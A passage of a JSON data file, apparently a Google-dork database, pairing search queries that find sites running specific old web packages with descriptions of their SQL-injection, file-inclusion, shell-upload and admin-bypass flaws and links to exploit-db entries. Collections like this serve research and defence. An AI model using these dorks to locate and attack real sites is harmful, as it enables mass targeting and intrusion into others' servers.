"\"SQuery 4.5\" |\"SQuery 4.0\" |\"SQuery 3.9\" | inurl:\"modules.php?name=SQuery\"", "description": "SQuery 4.5 (gore.php) Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/2003"}, {"dork": "\"Upload unique IP List:\" AND \"The Ultimate Fake Hit Generator - BOOST YOUR ALEXA RANK\"", "description": "Fake Hit Generator 2.2 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/10230"}, {"dork": "inurl:\"ir/addlink.php?id=\" OR inurl:\"addlink.php?id=\"", "description": "list Web (addlink.php id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10838"}, {"dork": "intext:\"powered and designed by Dow Group\"", "description": "Dow Group (new.php) SQL Injection: https://www.exploit-db.com/exploits/9491"}, {"dork": "intext:\"powered by Milonic\" inurl:viewnews.php?id=", "description": "Milonic News (viewnews) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11031"}, {"dork": "\"mirco blogging\"", "description": "x10 mirco blogging V121 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12042"}, {"dork": "\"Sitedesign by: Dieleman www.dieleman.nl - Copyright \u00a9 2010\"", "description": "Rave Creations/UHM (artists.asp) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12701"}, {"dork": "\"intext:Warning: passthru()\" \"inurl:view=help\"", "description": "PTC Site's RCE/XSS Vulnerability: https://www.exploit-db.com/exploits/12808"}, {"dork": "PHPG\u00c3\u00a9n\u00c3\u00a9alogie fonctionne sur un serveur PHP", "description": "PHPGenealogy 2.0 (DataDirectory) RFI Vulnerability - CVE: 2009-3541: https://www.exploit-db.com/exploits/9155"}, {"dork": "inurl:\"char.php?id=\" OR intitle:Minimanager for trinity server", "description": "https://www.exploit-db.com/exploits/12554/"}, {"dork": "inurl:\"product_desc.php?id=\" Powered by Zeeways.com", "description": "ZeeWays Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11087"}, {"dork": "\"Transloader by Somik.org\" OR \"Transloader by\" OR \"Transloder\"", "description": "Transload Script Upload Vulnerability: https://www.exploit-db.com/exploits/11155"}, {"dork": "Powered by ArticlesOne.com oR Website Powered by ArticlesOne.com", "description": "ArticlesOne 07232006 (page) Remote Include Vulnerability: https://www.exploit-db.com/exploits/2063"}, {"dork": "\"powered by CubeCart\" inurl:\"index.php?_a=\"", "description": "CubeCart (index.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11495"}, {"dork": "intext: \"Site developed & mantained by Woodall Creative Group\"", "description": "Woodall Creative SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12576"}, {"dork": "\"Web Group Communication Center beta 0.5.6\" OR \"Web Group Communication Center beta 0.5.5\"", "description": "WGCC 0.5.6b (quiz.php) Remote SQL Injection Vulnerability - CVE: 2006-5514: https://www.exploit-db.com/exploits/2604"}, {"dork": "inurl:\"picture.php?cat=\" \"Powered by PhpWebGallery 1.3.4\"", "description": "PhpWebGallery 1.3.4 (cat) Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6436"}, {"dork": "\"Powered by Glossword 1.8.11\" OR \"Powered by Glossword 1.8.6\"", "description": "Glossword 1.8.11 (index.php x) Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/9010"}, {"dork": "Maian Events v2.0 Copyright \u00c2\u00a9 2005-2008 Maian Script World. All Rights Reserved", "description": "Maian Events 2.0 Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/6048"}, {"dork": "inurl:categoria.php?ID= comune", "description": "Prometeo v1.0.65 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14806"}, {"dork": "\"Web site engine's code is copyright \u00c2\u00a9 2001-2007 ATutor\u00c2\u00ae\"", "description": "ATutor 1.6.1-pl1 (import.php) Remote File Inclusion Vulnerability - CVE: 2008-3368: https://www.exploit-db.com/exploits/6153"}, {"dork": "Cr\u00c3\u00a9\u00c3\u00a9 par Narfight, ClanLite V2.2006.05.20 \u00c2\u00a9 2000-2005", "description": "ClanLite 2.x (SQL Injection/XSS) Multiple Remote Vulnerabilities - CVE: 2008-5215: https://www.exploit-db.com/exploits/5595"}, {"dork": "\"Powered by Atomic Photo Album\" inurl:\"photo.php?apa_album_ID=\"", "description": "Atomic Photo Album 1.0.2 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/14801"}, {"dork": "\"100% | 50% | 25%\" \"Back to gallery\" inurl:\"show.php?imageid=\"", "description": "Easy Photo Gallery 2.1 Arbitrary Add Admin / remove user Vulnerability - CVE: 2008-4167: https://www.exploit-db.com/exploits/6437"}, {"dork": "Powered by DUdforum 3.0 inurl:/forums.asp?iFor=", "description": "DUdForum 3.0 (forum.asp iFor) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5894"}, {"dork": "allinurl: galid \"index.php?p=gallerypic\"", "description": "Koobi Pro 6.25 gallery Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5413"}, {"dork": "\"Powered by yappa-ng 2.3.1\" AND \"Powered by yappa-ng 2.3.1\"", "description": "yappa-ng 2.3.1 (admin_modules) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/2292"}, {"dork": "\"ActualAnalyzer Lite (free) 2.78\"+\"Copyright \u00c2\u00a9 2006 ActualScripts\"", "description": "ActualAnalyzer Lite (free) 2.78 Local File Inclusion Vulnerability - CVE: 2008-2076: https://www.exploit-db.com/exploits/5528"}, {"dork": "inurl:com_forum", "description": "com_forum Mambo Component"}, {"dork": "\"Copyright (c) 2004-2006 by Simple PHP Guestbook\"", "description": "Simple PHP Guestbook Remote Admin Access: https://www.exploit-db.com/exploits/10666"}, {"dork": "inurl:\"browse.php?folder=\" Powered by GeneShop 5", "description": "GeneShop 5.1.1 SQL Injection Vunerability: https://www.exploit-db.com/exploits/12442"}, {"dork": "inurl:/modules/Partenaires/clic.php?id=", "description": "Nuked-Klan Module Partenaires NK 1.5 Blind Sql Injection: https://www.exploit-db.com/exploits/14556"}, {"dork": "\"powered by DBHcms\"", "description": "DBHcms 1.1.4 Stored XSS: https://www.exploit-db.com/exploits/12499"}, {"dork": "intext:\"sitio web dise\u00f1ado por www.toronja.com.pe\"", "description": "Toronja Cms HTML/XSS Injection Vulnerability: https://www.exploit-db.com/exploits/12771"}, {"dork": "Maian Gallery v2.0 Copyright \u00c2\u00a9 2006-2008 Maian Script World. All Rights Reserved.", "description": "Maian Gallery 2.0 Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/6049"}, {"dork": "allintext:\" If you would like to contact us, our email address is\" traffic", "description": "Traffic Stats (referralUrl.php offset) Remote SQL Injection Vulnerbility - CVE: 2007-3840: https://www.exploit-db.com/exploits/4187"}, {"dork": "powered by apt-webservice ;apt-webshop-system v3.0", "description": "APT-WEBSHOP-SYSTEM modules.php SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14528"}, {"dork": "Maian Music v1.0. Copyright \u00c2\u00a9 2007-2008 Maian Script World. All Rights Reserved.", "description": "Maian Music 1.0 Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/6051"}, {"dork": "\"Help desk software by United Web Coders rev. 3.0.640\"", "description": "Trouble Ticket Software ttx.cgi Remote File Download: https://www.exploit-db.com/exploits/11823"}, {"dork": "\"Software PBLang 4.66z\" AND \"Software PBLang 4.60\" OR \"Software PBLang\"", "description": "PBLang 4.66z (temppath) Remote File Include Vulnerability - CVE: 2006-5062: https://www.exploit-db.com/exploits/2428"}, {"dork": "intext:\"Web design by goffgrafix.com\"", "description": "goffgrafix Design's SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12712"}, {"dork": "\"Welcome to Exponent CMS\" | \"my new exponent site\" inurl:articlemodule", "description": "Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11349"}, {"dork": "\"Powered by Drumbeat\" inurl:index02.php", "description": "Drumbeat CMS SQL Injection: https://www.exploit-db.com/exploits/10575"}, {"dork": "\"Designed & Developed by N.E.T E-Commerce Group. All Rights Reserved.\"", "description": "IranMC Arad Center (news.php id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6712"}, {"dork": "\"Powered by SocketMail Lite version 2.2.8. Copyright \u00c2\u00a9 2002-2006\"", "description": "SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability - CVE: 2007-5627: https://www.exploit-db.com/exploits/4554"}, {"dork": "Powered by WHMCompleteSolution - OR inurl:WHMCS OR announcements.php", "description": "WHMCS Control 2 (announcements.php) SQL Injection: https://www.exploit-db.com/exploits/12481"}, {"dork": "inurl:inc_catalogmanager.asp", "description": "DMXReady Catalog Manager 1.1 Remote Contents Change Vuln: https://www.exploit-db.com/exploits/7766"}, {"dork": "allinurl: \"pollBooth.php?op=results\"pollID", "description": "Pollbooth 2.0 (pollID) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5436"}, {"dork": "\"Factux le facturier libre V 1.1.5\"", "description": "Factux LFI Vulnerability: https://www.exploit-db.com/exploits/12521"}, {"dork": "Powered by XAOS systems", "description": "XAOS CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14469"}, {"dork": "inurl:inc_documentlibrarymanager.asp", "description": "DMXReady Document Library Manager 1.1 Contents Change Vuln: https://www.exploit-db.com/exploits/7769"}, {"dork": "inurl:\"phpRaid\" \"phpRaid\" \"roster.php?Sort=Race\"", "description": "phpRaid 3.0.7 (rss.php phpraid_dir) Remote File Inclusion: https://www.exploit-db.com/exploits/3528"}, {"dork": "inurl:\"classifieds.php?cat=\"", "description": "BM Classifieds Ads SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10314"}, {"dork": "inurl:\"index.php?option=com_jequoteform\"", "description": "Joomla Component com_jequoteform - Local File Inclusion - CVE: 2010-2128: https://www.exploit-db.com/exploits/12607"}, {"dork": "\"Software Categories\" \"Featured Resources\" \"Search\"", "description": "HotScripts Clone Script Remote SQL Injection Vulnerability - CVE: 2007-6084: https://www.exploit-db.com/exploits/4633"}, {"dork": "\"Website Powered By Creative SplashWorks - SplashSite\"", "description": "Creative SplashWorks-SplashSite (page.php) Blind Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11300"}, {"dork": "inurl:\"index.php?com_remository\"", "description": "Joomla Component (com_remository) Remote Upload File: https://www.exploit-db.com/exploits/14811"}, {"dork": "\u00c2\u00a9 2007 by Lama Software - Accomm Solutions GmbH & Co. KG", "description": "Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities - CVE: 2008-0423: https://www.exploit-db.com/exploits/4955"}, {"dork": "inurl:\"index.php?option=com_portfolio\"", "description": "Mambo Component Portfolio 1.0 (categoryId) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5139"}, {"dork": "Powered by Article DashBoard", "description": "Article Friendly SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11530"}, {"dork": "inurl:post.php?Category=Garage", "description": "GarageSales Remote Upload Vulnerability: https://www.exploit-db.com/exploits/12128"}, {"dork": "\"Send amazing greetings to your friends and relative!\"", "description": "greeting card Remote Upload Vulnerability: https://www.exploit-db.com/exploits/13751"}, {"dork": "inurl:tabid/176/Default.aspx OR inurl:portals/0/", "description": "DotNetNuke Remote File upload Vulnerability: https://www.exploit-db.com/exploits/12700"}, {"dork": "\"Eyeland Studio Inc. All Rights Reserved.\"", "description": "Eyeland Studio Inc. SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13855"}, {"dork": "Powered by Info Fisier", "description": "Info Fisier v1.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10726"}, {"dork": "Powered by ArticleMS from ArticleTrader", "description": "Article Management System 2.1.2 Reinstall Vulnerability: https://www.exploit-db.com/exploits/12858"}, {"dork": "\"powered by Sniggabo CMS\" inurl:article.php?id", "description": "Sniggabo CMS (article.php id) Remote SQL Injection: https://www.exploit-db.com/exploits/8933"}, {"dork": "\"Powered By 0DayDB v2.3\"", "description": "0DayDB 2.3 (delete id) Remote Admin Bypass: https://www.exploit-db.com/exploits/4896"}, {"dork": "intext:\"Powered by Max.Blog\"", "description": "Max.Blog 1.0.6 (show_post.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7885"}, {"dork": "\"Powered by Active PHP Bookmarks v1.3\" inurl:.view_group.php?id=", "description": "Active PHP Bookmarks v1.3 SQL Injection Vulnerability - CVE: 2008-3748: https://www.exploit-db.com/exploits/10597"}, {"dork": "Powered by: XP Book v3.0", "description": "XP Book v3.0 login Admin: https://www.exploit-db.com/exploits/10621"}, {"dork": "\"Powered by ispCP Omega\"", "description": "ispCP Omega 1.0.4 Remote File Include Vulnerability: https://www.exploit-db.com/exploits/11681"}, {"dork": "\"This site is powered by CMS Made Simple version 1.\"", "description": "CMS Made Simple 1.6.2 Local File Disclosure Vulnerability: https://www.exploit-db.com/exploits/9407"}, {"dork": "\"Jax Calendar v1.34 by Jack (tR), www.jtr.de/scripting/php\"", "description": "Jax Calendar 1.34 Remote Admin Access: https://www.exploit-db.com/exploits/10835"}, {"dork": "Powered by Platinum 7.6.b.5", "description": "PHP-Nuke Platinum 7.6.b.5 Remote File Inclusion Vulnerability - CVE: 2007-5676: https://www.exploit-db.com/exploits/4563"}, {"dork": "allinurl: \"index php p shop\"categ", "description": "Koobi Pro 6.25 shop Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5412"}, {"dork": "Rash Version: 1.2.1", "description": "RQMS (Rash) 1.2.2 Multiple SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/8433"}, {"dork": "Powered by: mevin productions", "description": "Basic PHP Events Lister 2 Add Admin: https://www.exploit-db.com/exploits/10515"}, {"dork": "inurl:\"catalog/product/detail.php?cat=\"", "description": "Webthaiapp detail.php(cat) Blind Sql injection Vulnerability: https://www.exploit-db.com/exploits/12467"}, {"dork": "inurl: user_info.php?user_id= \" Or \" inurl: index.php?catid= \"", "description": "Free Advertisment cms (user_info.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12572"}, {"dork": "Powered by:Traidnt Gallery Version 1.0.", "description": "Traidnt Gallery add Admin: https://www.exploit-db.com/exploits/10629"}, {"dork": "intitle: phpBazar-AdminPanel", "description": "phpBazar admin Information Disclosure Vulnerability: https://www.exploit-db.com/exploits/14439"}, {"dork": "allinurl: \"index.php?showlink\"links", "description": "Koobi Pro 6.25 links Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5411"}, {"dork": "\"Aurora CMS\"", "description": "Aurora CMS Remote SQL Injection: https://www.exploit-db.com/exploits/10609"}, {"dork": "alegrocart", "description": "Alegro 1.2.1 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12278"}, {"dork": "inurl:/hbcms/php/", "description": "HB CMS 1.7 SQL Injection: https://www.exploit-db.com/exploits/9835"}, {"dork": "inurl:\"list.php?lcat_id=\"", "description": "D-Tendencia Bt 2008 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10494"}, {"dork": "Designed and Developed by karkia E-commerce", "description": "E-commerce Group (cat.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12696"}, {"dork": "\"hlstats.php?mode=dailyawardinfo&award=\" hlstatsx", "description": "HLstatsX v1.65 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10850"}, {"dork": "Powered by Plogger!", "description": "Plogger Remote File Disclosure Vulnerability: https://www.exploit-db.com/exploits/14636"}, {"dork": "Help Desk Software by Kayako SupportSuite v3.70.02", "description": "Kayako eSupport v3.70.02 SQL Injection Vulnerability - CVE: 2010-2911: https://www.exploit-db.com/exploits/14392"}, {"dork": "\"powered by dataface\" \"powered by xataface\"", "description": "Xataface Admin Auth Bypass Vulnerability: https://www.exploit-db.com/exploits/11852"}, {"dork": "inurl:\"weblink_cat_list.php?bcat_id=\"", "description": "WHMCompleteSolution CMS sql Injection Vulnerability: https://www.exploit-db.com/exploits/10493"}, {"dork": "allinurl:\"/lildbi/\"", "description": "LILDBI Shell Upload Vulnerability: https://www.exploit-db.com/exploits/14443"}, {"dork": "\"Copyrights \u00c2\u00a9 2005 Belgische Federale Overheidsdiensten\"", "description": "Newsmanager 2.0 (RFI/RFD/SQL/PB) Multiple Remote Vulnerabilities - CVE: 2008-2342: https://www.exploit-db.com/exploits/5624"}, {"dork": "JBC explorer [ by Psykokwak & XaV ]", "description": "Explorer V7.20 Cross Site Scripting Vulnerability: https://www.exploit-db.com/exploits/10566"}, {"dork": "\"powered by Blue Dove Web Design\"", "description": "Blue Dove Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11360"}, {"dork": "\"Powered by Fantastic News v2.1.2\" or \"Powered by Fantastic News v2.1.3\"", "description": "Fantastic News 2.1.3 (script_path) Remote File Include Vulnerability - CVE: 2006-4285: https://www.exploit-db.com/exploits/2221"}, {"dork": "inurl:treplies.asp?message= intitle:ASP Talk", "description": "ASP Talk (SQL/CSS) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/7378"}, {"dork": "\"MidiCart PHP Database Management\"", "description": "MidiCart PHP,ASP Shell Upload Vulnerability: https://www.exploit-db.com/exploits/12636"}, {"dork": "[ Web Wiz Forums\u00ae version 9.64 [Free Express Edition] ]", "description": "Web Wiz Forums v9.64 Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/10638"}, {"dork": "Copyright 2006 \u00c2\u00a9 Flax Article Manager v1.1", "description": "Flax Article Manager 1.1 Remote PHP Script Upload Vulnerability: https://www.exploit-db.com/exploits/7884"}, {"dork": "allinurl:readmore.php?news_id", "description": "PHP-Fusion v4.01 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12635"}, {"dork": "\"Powered by Elgg, the leading open source social networking platform\"", "description": "elgg 1.5 (/_css/js.php) Local File Inclusion Vulnerability - CVE: 2009-3149: https://www.exploit-db.com/exploits/9355"}, {"dork": "inurl:/index.php?option=com_yellowpages", "description": "Joomla Yellowpages SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14592"}, {"dork": "\"Emanuele Guadagnoli\" \"CcMail\"", "description": "CcMail"}, {"dork": "This FAQ is powered by CascadianFAQ", "description": "CascadianFAQ 4.1 (index.php) Remote SQL Injection Vulnerability - CVE: 2007-0631: https://www.exploit-db.com/exploits/3227"}, {"dork": "\"site powered by intuitive-websites.com\"", "description": "intuitive (form.php) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11481"}, {"dork": "Copyright \u00a9 2010 ASP SiteWare. All rights reserved.", "description": "MSSQLi Vulnerability in AutoDealer Ver.1 and Ver.2 - CVE: 2007-0053: https://www.exploit-db.com/exploits/12462"}, {"dork": "intext:\"RPG Inferno is not available to guests\" or intext:\"Battle Ground \u00c2\u00b7 Clans \u00c2\u00b7 Store \u00c2\u00b7 Jobs \u00c2\u00b7 Auction \u00c2\u00b7 Spells Shop \u00c2\u00b7 Statistics \u00c2\u00b7 Member List\"", "description": "vBulletin Mod RPG Inferno 2.4 (inferno.php) SQL Injection Vulnerability - CVE: 2007-3687: https://www.exploit-db.com/exploits/4166"}, {"dork": "inurl:com_jstore", "description": "joomla com_jstore SQLi Vulnerability: https://www.exploit-db.com/exploits/13796"}, {"dork": "APBoard 2.1.0 \u00a9 2003-2010 APP - Another PHP Program", "description": "APBoard v2.1.0 ( board.php?id=) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14559"}, {"dork": "allintext:\"Browse our directory of our members top sites or create your own for free!\"", "description": "PHP123 Top Sites (category.php cat) Remote SQL Injection Vuln - CVE: 2007-4054: https://www.exploit-db.com/exploits/4241"}, {"dork": "\"ParsBlogger ? 2006. All rights reserved\"", "description": "ParsBlogger (links.asp id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6745"}, {"dork": "\"Powered by: PhotoPost PHP 4.6\" or \"Powered by: PhotoPost PHP 4.5\"", "description": "PhotoPost 4.6 (PP_PATH) Remote File Include Vulnerability - CVE: 2006-4828: https://www.exploit-db.com/exploits/2369"}, {"dork": "\"Powered by PG Online Training Solution - learning management system\"", "description": "Pilot Group eTraining (news_read.php id) SQL Injection Vulnerability - CVE: 2008-4709: https://www.exploit-db.com/exploits/6613"}, {"dork": "inurl:cart.php?m=features&id=", "description": "digiSHOP SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15405"}, {"dork": "\"Bu Site Ticimax E-Ticaret yaz\u0131l\u0131m\u0131 ile haz\u0131rlanm\u0131\u015ft\u0131r.\"", "description": "Ticimax E-Ticaret ( SQL Injection ): https://www.exploit-db.com/exploits/12841"}, {"dork": "Powered by: Arab Portal inurl:mod.php?mod=html", "description": "Arab Portal 2.1 Remote File Disclosure Vulnerability - CVE: 2008-5787: https://www.exploit-db.com/exploits/7019"}, {"dork": "Powered by NKINFOWEB VSp \u00a9 2009", "description": "NKINFOWEB SQL Injection - CVE: 2010-1599: https://www.exploit-db.com/exploits/12354"}, {"dork": "Powered by: PHPDirector 0.30 or nurl:videos.php?id=", "description": "PHPDirector 0.30 (videos.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14106"}, {"dork": "\"Powered by RedCat\" inurl:index.php?contentId=", "description": "redcat media SQL Injection: https://www.exploit-db.com/exploits/10043"}, {"dork": "powered by x7 chat 1.3.6b", "description": "X7CHAT v1.3.6b Add Admin: https://www.exploit-db.com/exploits/10931"}, {"dork": "intext:Powered by Infront", "description": "Infront SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13848"}, {"dork": "Powered by Info Fisier.", "description": "Info Fisier 1.0 multiple Vulnerabilities: https://www.exploit-db.com/exploits/10728"}, {"dork": "Powered by WHMCompleteSolution - or inurl:WHMCS", "description": "WHMCS control (WHMCompleteSolution) Sql Injection - CVE: 2010-1702: https://www.exploit-db.com/exploits/12371"}, {"dork": "inurl:\"product_desc.php?id=\" Powered by Zeeways.com", "description": "Zeeways Script Multiple Vulnerabilities - CVE: 2010-2144: https://www.exploit-db.com/exploits/12805"}, {"dork": "\"Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media\"", "description": "Subdreamer Pro v3.0.4 CMS upload Vulnerability: https://www.exploit-db.com/exploits/14101"}, {"dork": "\"Desenvolvido por WeBProdZ\"", "description": "WeBProdZ CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12522"}, {"dork": "inurl:\"inurl:file.php?recordID=\"", "description": "FILE SHARE v1.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10497"}, {"dork": "\"Powered by myBusinessAdmin and Red Cow Technologies, Inc.\"", "description": "myBusinessAdmin (content.php) Blind Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11327"}, {"dork": "\"Powered by cityadmin and Red Cow Technologies, Inc.\"", "description": "cityadmin (links.php) Blind Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11326"}, {"dork": "\"Powered by RealAdmin and Red Cow Technologies, Inc.\"", "description": "RealAdmin (detail.php) Blind Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11325"}, {"dork": "mod.php?mod=publisher&op=printarticle&artid=", "description": "eNdonesia 8.4 SQL Injection Vulnerability - CVE: 2010-3461: https://www.exploit-db.com/exploits/15006"}, {"dork": "inurl:\"index.php?option=com_spa\"", "description": "Joomla Component com_spa SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14423"}, {"dork": "inurl:\"photo_album.php?alb_id=\"", "description": "SpireCMS v2.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10408"}, {"dork": "intext : \"Website by conceptinternetltd\"", "description": "Concept E-commerce SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14512"}, {"dork": "Powered by PHP Melody 1.5.3", "description": "blog ink Bypass Setting Vulnerability: https://www.exploit-db.com/exploits/11462"}, {"dork": "inurl:\"guestbook.admin.php?action=settings\"", "description": "Jax Guestbook 3.50 Admin Login - CVE: 2009-4447: https://www.exploit-db.com/exploits/10626"}, {"dork": "\"Developed by Bispage.com\"", "description": "bispage Bypass Vulnerability: https://www.exploit-db.com/exploits/11555"}, {"dork": "Script cr\u00e9\u00e9 par Funewik - Dezign-Box \u00a9 France", "description": "Galerie Dezign-Box France Multi Vulnerability: https://www.exploit-db.com/exploits/11523"}, {"dork": "\"by in-link\" or \"Powered by In-Link 2.\"", "description": "In-link 2.3.4 (ADODB_DIR) Remote File Include Vulnerabilities: https://www.exploit-db.com/exploits/2295"}, {"dork": "allintext:\"Latest Pictures\" Name Gender Profile Rating", "description": "Pictures Rating (index.php msgid) Remote SQL Injection Vulnerbility - CVE: 2007-3881: https://www.exploit-db.com/exploits/4191"}, {"dork": "inurl:\"noticias.php?notiId=\"", "description": "Ele Medios CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10418"}, {"dork": "Copyright 2008 Free Image & File Hosting", "description": "Free Image & File Hosting Upload Vulnerability: https://www.exploit-db.com/exploits/12105"}, {"dork": "\"PHP Gallery \u00a9 2010 PHP Weby hostgator coupon\"", "description": "Free PHP photo gallery script Remote File inclusion Vulnerability: https://www.exploit-db.com/exploits/14438"}, {"dork": "\"Send amazing greetings to your friends and relative!\"", "description": "Greeting card SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13983"}, {"dork": "\"PHP Gallery \u00a9 2010 PHP Weby hostgator coupon\"", "description": "ValidForm Builder script Remote Command Execution Vulnerability: https://www.exploit-db.com/exploits/14454"}, {"dork": "Copyright \u00c2\u00a9 2007 Agares Media. Powered by AMCMS3.", "description": "Arcadem Pro (articlecat) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6624"}, {"dork": "inurl:\"lista_articulos.php?id_categoria=\"", "description": "SitioOnline SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10453"}, {"dork": "\"PHPWebAdmin for hMailServer\" intitle:PHPWebAdmin -site:hmailserver.com", "description": "hMAilServer 4.4.2 (PHPWebAdmin) File Inclusion Vulnerabilities: https://www.exploit-db.com/exploits/7012"}, {"dork": "Copyright 2010 My Hosting. All rights reserved", "description": "Hosting-php-dynamic (Auth Bypass) Vulnerability: https://www.exploit-db.com/exploits/11968"}, {"dork": "\"PHP Gallery \u00a9 2010 PHP Weby hostgator coupon\"", "description": "Free PHP photo gallery script Remote Command Execution Vulnerability: https://www.exploit-db.com/exploits/14437"}, {"dork": "\"index.php?option=com_chronocontact\" / \"com_chronocontact\"", "description": "Joomla Component ChronoForms (com_chronocontact): https://www.exploit-db.com/exploits/12843"}, {"dork": "\"pages.php?page_ID=\" \"K9 Kreativity\"", "description": "K9 Kreativity Design (pages.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12866"}, {"dork": "inurl:\"picture.php?cat=\" \"Powered by PhpWebGallery 1.3.4\"", "description": "PhpWebGallery 1.3.4 (XSS/LFI) Multiple Vulnerabilities - CVE: 2008-4591: https://www.exploit-db.com/exploits/6425"}, {"dork": "\"index.php?option=com_chronoconnectivity\" / \"com_chronoconnectivity", "description": "Joomla Component ChronoConnectivity: https://www.exploit-db.com/exploits/12842"}, {"dork": "Powered by cP Creator v2.7.1", "description": "cP Creator v2.7.1 Remote Sql Injection - CVE: 2009-3330: https://www.exploit-db.com/exploits/9726"}, {"dork": "Powered by PHP Advanced Transfer Manager v1.10 - @2002 Bugada Andrea", "description": "PHP Advanced Transfer Manager v1.10 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11613"}, {"dork": "Powered by iScripts EasyBiller", "description": "iScripts easybiller v1.1 sqli vulnerability: https://www.exploit-db.com/exploits/13741"}, {"dork": "\"Powered By phpCOIN v1.2.1\" / \"mod.php?mod=faq\"", "description": "phpCOIN 1.2.1 (mod.php) LFI Vulnerability - CVE: 2010-0953: https://www.exploit-db.com/exploits/11641"}, {"dork": "intext:\"Powered By WorldPay\" inurl:productdetail.php", "description": "WorldPay Script Shop (productdetail) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10976"}, {"dork": "inurl:\"com_dbquery\" OR \"index.php?option=com_dbquery\"", "description": "Joomla Component DBQuery 1.4.1.1 RFI Vulnerability - CVE: 2008-6841: https://www.exploit-db.com/exploits/6003/"}, {"dork": "Powered by Discuz! 1.0 \u00a9 2002, Crossday Studio of 11cn.org", "description": "Discuz 1.03 SQL Injection Exploit Vulnerability: https://www.exploit-db.com/exploits/10861"}, {"dork": "Power by donghungx. Copyright \u00a9 2008 AttMp3.com. All rights reserved.", "description": "SongForever.com Clone Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11476"}, {"dork": "\"Powered by osCMax v2.0\" , \"Copyright @\" \"RahnemaCo.com\"", "description": "osCMax 2.0 (fckeditor) Remote File Upload: https://www.exploit-db.com/exploits/11771"}, {"dork": "intext:\"Free Ecommerce Shopping Cart Software by ViArt\" +\"Your shopping cart is empty!\" + \"Products Search\" +\"Advanced Search\" + \"All Categories\"", "description": "ViArt Shopping Cart 3.5 Multiple Remote Vulnerabilities - CVE: 2008-6758: https://www.exploit-db.com/exploits/7628"}, {"dork": "\"powered by WonderEdit Pro\"", "description": "WonderEdit Pro CMS (template_path) Remote File Include Vulnerabilities - CVE: 2006-3422: https://www.exploit-db.com/exploits/1982"}, {"dork": "\"PHP Link Portal v1.95.1 \u00c2\u00a9 Big Resources, Inc.\"", "description": "Built2Go PHP Link Portal 1.95.1 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/7644"}, {"dork": "[ Copyright 2005-2006 phpDirectorySource\u00e2\u201e\u00a2, all rights reserved ]", "description": "phpDirectorySource (XSS/SQL) Multiple Remote Vulnerabilities - CVE: 2009-4681: https://www.exploit-db.com/exploits/9226"}, {"dork": "\"index.php?option=com_sef\" / \"com_sef\"", "description": "Joomla Component Sef (com_sef) - LFI Vulnerability: https://www.exploit-db.com/exploits/14213"}, {"dork": "inurl:.asp? Powered by Comersus ASP Shopping Cart", "description": "Comersus ASP Shopping Cart (DD/XSS) Multiple Remote Vulnerabilities: 